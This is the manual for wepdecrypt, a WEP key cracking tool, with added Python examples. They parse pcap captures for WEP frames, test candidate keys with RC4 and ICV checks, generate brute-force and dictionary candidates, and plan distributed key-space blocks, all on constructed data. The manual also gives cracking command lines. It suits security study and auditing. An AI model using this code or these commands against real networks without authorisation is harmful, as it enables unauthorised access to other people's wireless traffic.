Wepdecrypt is a wireless LAN tool written in C that recovers WEP keys by an active dictionary attack, an internal key generator, a distributed network attack and some other methods. It is based on wepattack and is GPL licensed.
2. What you need to install wepdecrypt.
To install wepdecrypt you need these libraries:
- libpcap (http://www.tcpdump.org/)
- libz (http://www.zlib.net/)
- openssl (http://www.openssl.org/)
- fltk (optional, only needed to compile the graphical interface; must be >= 1.1.6)
Libz ships with almost every distro, so normally you only have to install the other two. In some distros you also have to install the package headers (usually the -dev packages).
Once you have installed these libraries just type:
./configure; make
To install without the GUI type:
./configure --disable-gui; make
You can also specify the destination directory with:
./configure --with-dest-dir=destdir; make
To disable the wkeygen tool:
./configure --disable-keygentool; make
and then, as root:
make install
Other make targets are available:
make clean - cleans the build environment.
make purge - similar to clean, but you will need to rerun ./configure afterwards.
make uninstall - uninstalls the package (needs root privileges).
Installing john the ripper is also highly recommended, but it is not mandatory. Wepdecrypt only works in little-endian Linux environments; don't try it on others. At present the x86 and mips architectures have been successfully tested.
3. Short explanation about dumpfiles.
Dumpfiles are the main piece needed to make wepdecrypt work: these files contain the encrypted packets from which wepdecrypt must recover the key. Wepdecrypt itself does not generate such files, so you need another program to produce them. I suggest kismet (http://www.kismetwireless.net/), but any program that writes libpcap dumps will do.
The dumpfile needs to contain at least one encrypted packet for wepdecrypt to work. One encrypted packet is all wepdecrypt needs, so you don't have to generate huge dumpfiles.
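To check a capture before handing it to wepdecrypt, here is an added example (my own code, not part of wepdecrypt) that walks a libpcap file, picks out the 802.11 data frames whose Protected bit is set and reports the BSSID, IV and key index of each. It accepts raw 802.11 dumps (libpcap link type 105) and dumps with a radiotap header (link type 127) by skipping that header. select_frames() mimics the behaviour the -b option describes further down: keep one AP's frames, but fall back to every network when that MAC is not in the dump. The sample dump, the MAC addresses and the ciphertext filler are constructed for the example and never decrypted here.

```python
import struct

LINKTYPE_IEEE802_11 = 105           # raw 802.11 frames
LINKTYPE_IEEE802_11_RADIOTAP = 127  # 802.11 frames preceded by a radiotap header


def parse_pcap(data):
    """Return (linktype, [packet bytes, ...]) for a classic libpcap file in either byte order."""
    if len(data) < 24:
        raise ValueError("too short for a libpcap global header")
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a libpcap dump (magic 0x%08x)" % magic)
    linktype = struct.unpack_from(endian + "I", data, 20)[0]
    pkts, off = [], 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        pkts.append(data[off:off + incl_len])
        off += incl_len
    return linktype, pkts


def mac_str(mac):
    return ":".join("%02x" % b for b in mac)


def wep_frames(data):
    """(bssid, iv_hex, key_index) for every 802.11 data frame whose Protected bit is set."""
    linktype, pkts = parse_pcap(data)
    found = []
    for pkt in pkts:
        if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
            rt_len = struct.unpack_from("<H", pkt, 2)[0]   # radiotap length is little-endian
            pkt = pkt[rt_len:]
        elif linktype != LINKTYPE_IEEE802_11:
            raise ValueError("link type %d is not 802.11" % linktype)
        if len(pkt) < 24:
            continue
        fc0, fc1 = pkt[0], pkt[1]
        if (fc0 >> 2) & 3 != 2:          # frame type 2 = data; only data frames carry a WEP body
            continue
        if not fc1 & 0x40:               # Protected Frame bit clear: sent in the clear
            continue
        to_ds, from_ds = fc1 & 1, (fc1 >> 1) & 1
        if to_ds and from_ds:            # 4-address WDS frame, no single BSSID
            continue
        a1, a2, a3 = pkt[4:10], pkt[10:16], pkt[16:22]
        bssid = a1 if to_ds else (a2 if from_ds else a3)
        hdr = 26 if fc0 & 0x80 else 24   # QoS data subtypes add a 2-byte QoS control field
        body = pkt[hdr:]
        if len(body) < 8:                # IV (3) + key id (1) + at least the ICV (4)
            continue
        found.append((mac_str(bssid), body[:3].hex(), body[3] >> 6))
    return found


def select_frames(data, ap_mac=None):
    """-b style filter: only the given AP's frames, or every network if that MAC is absent."""
    frames = wep_frames(data)
    if ap_mac:
        mine = [f for f in frames if f[0] == ap_mac.lower()]
        if mine:
            return mine
    return frames


def usable(data, ap_mac=None):
    """True when the dump holds the one encrypted packet wepdecrypt needs."""
    return len(select_frames(data, ap_mac)) > 0


# --- constructed sample dump (not a real capture) ---
def _frame(fc0, fc1, a1, a2, a3, body):
    return bytes([fc0, fc1, 0, 0]) + a1 + a2 + a3 + b"\x00\x00" + body


def _pcap(linktype, pkts):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, p in enumerate(pkts):
        out += struct.pack("<IIII", 1000000 + i, 0, len(p), len(p)) + p
    return out


AP = bytes.fromhex("00112233aabb")
STA = bytes.fromhex("001122ccddee")
# a beacon (management frame, never encrypted) and one WEP data frame from the AP to the station;
# IV 0a:0b:0c, key id 0, then 20 bytes of ciphertext filler and a 4-byte ICV placeholder
BEACON = _frame(0x80, 0x00, b"\xff" * 6, AP, AP, bytes(12))
WEP_DATA = _frame(0x08, 0x42, STA, AP, STA, bytes.fromhex("0a0b0c") + b"\x00" + bytes(20) + bytes(4))
RADIOTAP = b"\x00\x00\x0c\x00" + bytes(8)   # 12-byte radiotap header with no fields present
SAMPLE_DUMP = _pcap(LINKTYPE_IEEE802_11, [BEACON, WEP_DATA])
SAMPLE_DUMP_RT = _pcap(LINKTYPE_IEEE802_11_RADIOTAP, [RADIOTAP + BEACON, RADIOTAP + WEP_DATA])
```

Run wep_frames() on a real dump and you get one line per encrypted data frame; if the list is empty the sniffer either saw no data traffic on that network or wrote a link type other than 105/127, and wepdecrypt will have nothing to test keys against.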
At this stage you should have wepdecrypt installed and a fresh dumpfile available on your system, so it's time to show wepdecrypt in action. First of all, the options:
-f dumpfile
    Network dumpfile to read, in PCAP format (as written by TCPDUMP, ETHEREAL or KISMET).
-s
    Server mode: runs wepdecrypt as a server daemon that manages a distributed network attack (doesn't work in windows).
-w wordfile
    Take keys from a file to perform a dictionary attack (not valid with the 64 or 128 modes).
-b mac_address
    Filter one address from the dumpfile; this is done to decrypt only the packets of one access point (referenced by its MAC). If the given AP MAC isn't found, the program will try to decrypt all the networks found in the dumpfile.
-m mode
    Specifies the decrypting mode (default all). Values: 64, 128, n64, n128, nall.
-i key
    For the internal key generator (used with the 64 or 128 mode): specifies the start key.
-e key
    For the internal key generator (used with the 64 or 128 mode): specifies the last key.
-c server:port
    Client mode: server is the host where wepdecrypt is running in server mode and port is the port number the server is listening on.
-n network
    network is a number that specifies the maximum number of keys to decrypt; by default wepdecrypt will try to decrypt all the packets with different keys it finds.
-d mode
    mode can be all, alpha, alphanumeric, numeric, random or printable; this option sets the mode for the new key generator. For example "-m 64 -d numeric" will try keys from "00000" to "99999".
-g
    Used with client mode to get the file to decrypt from the server.
-l num_blocks
    Used with client mode to set the number of blocks to decrypt; if num_blocks is 0 the client will keep decrypting blocks while the server has blocks to assign.
-v
    Shows the current version.
-?|-h
    Shows the help menu.
As a first approach I suggest you use the wepdecrypt_inc script or a dictionary to try commonly used keys:
wepdecrypt_inc dumpfile
wepdecrypt -f dumpfile -w dictionary_file
Now let's see some other methods:
wepdecrypt -f dumpfile -m64 -i 00:00:00:00:00 -e FF:FF:FF:FF:FF
wepdecrypt -f dumpfile -m128 -i 11:22:33:44:55:66:77:88:99:0A:0B:0C:0D
wepdecrypt -f dumpfile -m64 -d alpha
wepdecrypt -f dumpfile -m128 -d all
These use the internal key generator to try all the specified keys (keys are 5 bytes in 64 mode and 13 bytes in 128 mode). You can stop wepdecrypt at any time and resume the session later: take a look at the logfile and use the last key tried as the init key (-i) to continue the cracking session. If the init key is not specified 00:..:00 will be used, and if the last key is not specified FF:..:FF will be used.
Finally, the most powerful mode: the distributed network attack. First of all start wepdecrypt in server mode:
wepdecrypt -s -f local.dump -m 64 &
In server mode the init key can also be specified with the -i flag.
Now run wepdecrypt as a client. First get the dumpfile from the server, then start wepdecrypt in client mode:
wepdecrypt -c example.com:3657 -g
wepdecrypt -c example.com:3657 -l 0
(An IP address can be used instead of the hostname; the port is whatever Port= is set to in the server's $HOME/.wepdecrypt.)
Short explanation about packet filters:
-b selects an AP (the MAC of the AP must be used to select it).
-n selects the number of packets; this is independent from -b.
The wordfile can now also contain hex keys, which are used as keys exactly as written. To use this feature the first line of the wordfile must be HEXKEY_FILE.
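What every mode above does per candidate, and why one encrypted packet is enough, is easiest to see in code. The following is an added example of mine, not wepdecrypt's code: it implements the test wepdecrypt must run for each key (RC4-decrypt the body with IV||key and compare the trailing ICV with the CRC-32 of the recovered plaintext), plus three candidate sources, an -i/-e style hex range generator that can be restarted from a logged key, a -d style character-set generator, and a -w wordfile reader that honours the HEXKEY_FILE marker. The capture, the key "00042" and the payloads are constructed inline; the alphabets behind the -d mode names and the skipping of wrongly sized dictionary words are my assumptions, not documented behaviour.

```python
import itertools
import string
import struct
import zlib

KEY_BYTES = {"64": 5, "128": 13}   # -m 64 keys are 40 bits, -m 128 keys are 104 bits

def rc4(key, length):
    """RC4 keystream of `length` bytes for `key`: key scheduling, then output generation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(length), 0, 0
    for n in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = s[(s[i] + s[j]) & 0xFF]
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, appended little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_body(key, iv, plaintext):
    """Encrypted frame body: IV || key-id byte || RC4(iv||key) over plaintext || ICV.
    Used only to build the constructed capture below."""
    return iv + b"\x00" + xor(plaintext + icv(plaintext), rc4(iv + key, len(plaintext) + 4))

def key_is_valid(bodies, key):
    """The per-candidate test: decrypt each body with iv||key and check that the recovered
    trailing ICV is the CRC-32 of the recovered plaintext. One frame is enough to find the
    key; checking a second one makes the 2^-32 chance of a false match negligible."""
    for body in bodies:
        iv, ct = body[:3], body[4:]
        pt = xor(ct, rc4(iv + key, len(ct)))
        if icv(pt[:-4]) != pt[-4:]:
            return False
    return True

def str_to_key(s):
    return bytes.fromhex(s.replace(":", ""))

def key_to_str(key):
    return ":".join("%02X" % b for b in key)

def hex_range_keys(start, end):
    """-i/-e style: every key from start to end inclusive, counted as one big-endian number."""
    first, last = str_to_key(start), str_to_key(end)
    for v in range(int.from_bytes(first, "big"), int.from_bytes(last, "big") + 1):
        yield v.to_bytes(len(first), "big")

CHARSETS = {   # assumed alphabets: the page names the -d modes but not their character sets
    "numeric": string.digits,
    "alpha": string.ascii_letters,
    "alphanumeric": string.ascii_letters + string.digits,
    "printable": "".join(c for c in string.printable if c not in string.whitespace),
}

def charset_keys(mode, nbytes):
    """-d style: every string of nbytes characters over the alphabet, in order
    ("-m 64 -d numeric" yields "00000", "00001", ... "99999")."""
    for chars in itertools.product(CHARSETS[mode], repeat=nbytes):
        yield "".join(chars).encode()

def wordfile_keys(text):
    """-w style: one candidate per line; a first line of HEXKEY_FILE makes the rest hex keys."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if lines and lines[0] == "HEXKEY_FILE":
        return [str_to_key(ln) for ln in lines[1:]]
    return [ln.encode() for ln in lines]

def crack(bodies, candidates, keylen):
    """Try candidates in order; returns (key, tried) or (None, tried). Candidates of the
    wrong length are skipped (assumption: a 40-bit mode cannot use an 8-byte word)."""
    tried = 0
    for key in candidates:
        if len(key) != keylen:
            continue
        tried += 1
        if key_is_valid(bodies, key):
            return key, tried
    return None, tried

# constructed capture: two frames of one network encrypted under the 64-bit key "00042"
SECRET = b"00042"
LLC = bytes.fromhex("aaaa030000000800")   # SNAP header that starts every IP-over-802.11 frame
BODIES = [wep_body(SECRET, bytes.fromhex("0a0b0c"), LLC + b"constructed payload one"),
          wep_body(SECRET, bytes.fromhex("0a0b0d"), LLC + b"constructed payload two")]

def demo_wordfile():       # "password" is not a 5-byte key and is skipped
    return crack(BODIES, wordfile_keys("password\n12345\n00042\n"), KEY_BYTES["64"])

def demo_hexfile():        # same key written in HEXKEY_FILE notation
    return crack(BODIES, wordfile_keys("HEXKEY_FILE\n01:02:03:04:05\n30:30:30:34:32\n"), KEY_BYTES["64"])

def demo_numeric():        # "-m 64 -d numeric": the key is the 43rd string tried
    return crack(BODIES, charset_keys("numeric", 5), 5)

def demo_resume():         # resume from the last key in the logfile instead of 00:00:00:00:00
    return crack(BODIES, hex_range_keys("30:30:30:34:00", "30:30:30:34:FF"), 5)
```

The resume demo is the logfile trick from above: the range 30:30:30:34:00 to 30:30:30:34:FF is a 256-key slice of the 2^40 key space, and the hit comes after 51 candidates instead of the 2^37 or so a cold start from 00:00:00:00:00 would need. The check itself is only an ICV match, so when a real run reports a key, verify it against at least one more packet of the same network before trusting it.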
$HOME/.wepdecrypt

#Wepdecrypt configuration file
#Server listening port
Port=3617
#Blocksize can be set up to 1099511627775
Blocksize=4294967296 (01:00:00:00:00)
#Full path to server logfile
Logfile=/var/tmp/wepdecrypt_s.log
#Verbosity levels: 1 - LOW 2 - MEDIUM 3 - HIGH
Verbosity=2

This should be self-explanatory: it holds the server configuration, and all of the fields must be present in the file. The annotation next to Blocksize is the same 5-byte notation used for -i/-e: 4294967296 is 01:00:00:00:00, and the maximum of 1099511627775 is FF:FF:FF:FF:FF, i.e. the whole 40-bit key space of the 64 mode.
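As an added example (mine, not part of wepdecrypt), here is a parser for this file that enforces what its comments state, namely that every field is present, Blocksize lies between 1 and 1099511627775 and Verbosity is 1, 2 or 3, together with a function that splits the key space a server hands out into Blocksize-sized blocks, reproducing the 01:00:00:00:00 annotation. The configuration text is the one above; that blocks are contiguous ranges of Blocksize keys, and that a trailing annotation after a value is ignored, are my assumptions about the server, not documented behaviour.

```python
KEY_BYTES = 5                    # the server example on this page runs in -m 64 mode: 40-bit keys
MAX_BLOCKSIZE = (1 << 40) - 1    # 1099511627775, the maximum quoted in the config comments
REQUIRED = ("Port", "Blocksize", "Logfile", "Verbosity")


def parse_config(text):
    """Parse the Key=Value lines of $HOME/.wepdecrypt. Lines starting with '#' are comments.
    Anything after whitespace in a value (such as "(01:00:00:00:00)") is ignored: an assumption."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" not in line:
            raise ValueError("not a Key=Value line: %r" % raw)
        key, value = (part.strip() for part in line.split("=", 1))
        cfg[key] = value.split()[0] if value else ""
    missing = [k for k in REQUIRED if k not in cfg]
    if missing:
        raise ValueError("missing fields: " + ", ".join(missing))
    port, blocksize, verbosity = int(cfg["Port"]), int(cfg["Blocksize"]), int(cfg["Verbosity"])
    if not 1 <= port <= 65535:
        raise ValueError("Port out of range")
    if not 1 <= blocksize <= MAX_BLOCKSIZE:
        raise ValueError("Blocksize must be between 1 and %d" % MAX_BLOCKSIZE)
    if verbosity not in (1, 2, 3):
        raise ValueError("Verbosity must be 1, 2 or 3")
    return {"Port": port, "Blocksize": blocksize, "Logfile": cfg["Logfile"], "Verbosity": verbosity}


def key_str(n):
    """Integer key -> the XX:XX:XX:XX:XX notation used by -i/-e and the Blocksize comment."""
    return ":".join("%02X" % b for b in n.to_bytes(KEY_BYTES, "big"))


def key_int(s):
    return int.from_bytes(bytes.fromhex(s.replace(":", "")), "big")


def blocks(blocksize, init_key="00:00:00:00:00", last_key="FF:FF:FF:FF:FF"):
    """Split [init_key, last_key] into consecutive blocks of `blocksize` keys, the unit a client
    asks for with -l (assumption: blocks are contiguous key ranges of that size). The final
    block is shorter when the range does not divide evenly."""
    start, end = key_int(init_key), key_int(last_key)
    while start <= end:
        stop = min(start + blocksize - 1, end)
        yield key_str(start), key_str(stop)
        start = stop + 1


# the configuration shown on this page, embedded so the example runs offline
SAMPLE_CONFIG = """#Wepdecrypt configuration file
#Server listening port
Port=3617
#Blocksize can be set up to 1099511627775
Blocksize=4294967296 (01:00:00:00:00)
#Full path to server logfile
Logfile=/var/tmp/wepdecrypt_s.log
#Verbosity levels: 1 - LOW 2 - MEDIUM 3 - HIGH
Verbosity=2
"""


def work_plan(config_text, init_key="00:00:00:00:00"):
    """(blocksize, number of blocks, first block, last block) for a server started with -i init_key."""
    cfg = parse_config(config_text)
    plan = list(blocks(cfg["Blocksize"], init_key))
    return cfg["Blocksize"], len(plan), plan[0], plan[-1]
```

With the values above the 64-mode key space becomes 256 blocks of 2^32 keys, from 00:00:00:00:00-00:FF:FF:FF:FF to FF:00:00:00:00-FF:FF:FF:FF:FF; a server started with -i 80:00:00:00:00 has only the upper 128 left to hand out.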
/etc/wedecrypt.conf

#
# /etc/wedecrypt.conf
#
# Configuration for WEPDECRYPT
# Fernando Tarin

JOHNDIR=/usr/sbin/ (usual place)
WORDLIST=/usr/src/john-1.6/run/wordlist

This is used by wepdecrypt_inc and wepdecrypt_word, which use john the ripper to generate keys.
In the windows version all files should be in the same directory as wepdecrypt.
6. Graphic interface.
This is the graphical interface for wepdecrypt. The GUI is pretty self-explanatory: every input box is labelled with a flag name, just change it to your desired value and hit the check button next to the input box. Besides that, there is now a help option in the help menu (also reachable by pressing "Ctrl+h") that explains every option. To start wepdecrypt press the start button. The default directory for the wepdecrypt output logs is /tmp/ (in the windows version it is the directory in which gwepdecrypt is running); it can be changed through the GUI or the $HOME/.wepdecrypt file.
7. Wkeygen.
Wkeygen is a tool that generates WEP keys. It is provided to make it easy to create wordfiles containing hex keys. Usage is pretty simple: just use the -? flag to see its options (linux version only).
8. How to help the project.